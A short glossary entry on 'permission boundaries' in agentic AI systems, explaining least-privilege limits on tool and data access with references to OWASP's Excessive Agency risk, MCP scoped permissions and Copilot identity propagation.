Glossary term
Glossary term
Agentic Systems
The explicit limit on what tools, APIs, data, and actions an AI system may access. Weak permission boundaries turn output errors or prompt attacks into real operational impact. This boundary should be enforced technically, not only described in policy, and should be reviewed whenever new tools or integrations are added.
OWASP LLM06:2025 Excessive Agency identifies excessive functionality, permissions, and autonomy as common failure modes, mitigated through least-privilege tool boundaries.
Anthropic's Model Context Protocol (MCP) supports scoped server permissions so agents can only access declared tools and resources.
Microsoft Copilot's identity propagation ensures tool calls execute under the user's permissions rather than the agent's broader identity.